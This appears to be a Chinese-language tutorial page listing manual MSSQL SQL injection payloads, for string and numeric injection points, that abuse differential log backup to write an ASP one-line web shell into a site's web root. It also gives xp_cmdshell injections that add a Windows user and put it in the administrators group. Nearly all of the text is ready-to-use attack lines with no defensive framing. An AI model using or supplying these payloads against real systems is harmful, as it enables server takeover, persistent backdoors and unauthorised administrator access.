手工實現差異備份的步驟
字符型:
1、恢復當前庫
;alter database 當前庫 set RECOVERY FULL--
2、建表cmd
;create table cmd (a image)--
3、備份當前庫到D:\cmd1
;backup log 當前庫 to disk = 'D:\cmd1' with init--
4、插入一句話代碼到創建的表cmd
;insert into cmd (a) values ('%%25**ecute(request("a"))%%25>')--
5、備份一句話代碼到站點根目錄
;backup log 當前庫 to disk = 'D:\www_web\oct.asp'--
6、完成
;drop table 創建的表--
數字型
1、恢復當前庫
';alter database 當前庫 set RECOVERY FULL--
2、創建表cmd
';create table cmd (a image)--
3、備份當前庫到D:\cmd1
';backup log 當前庫 to disk = 'D:\cmd1' with init--
4、插入一句話代碼到創建的表cmd
';insert into cmd (a) values ('%%25**ecute(request("a"))%%25>')--
5、備份一句話代碼到站點根目錄
';backup log 當前庫 to disk = 'D:\www_web\oct.asp'--
6、完成
';drop table 創建的表--
sa權限創建管理員用戶
1、判斷是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判斷當前系統的連接用戶是不是sa
2、添加系統的管理員
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--
逍遙復仇:有工具我是一定不會手工的,麻煩。
您可能感興趣的文章:- C#實現MySQL命令行備份和恢復
- C#實現的SQL備份與還原功能示例
- c#使用file.copy實現文件備份示例
- Python 實現文件的全備份和差異備份詳解
- Python實現網站文件的全備份和差異備份
- 提權思路之MSSQL差異備份取系統權限
- MSSQL差異備份取系統權限的相關軟件下載
- 復習一下sql server的差異備份
- C#寫差異文件備份工具的示例
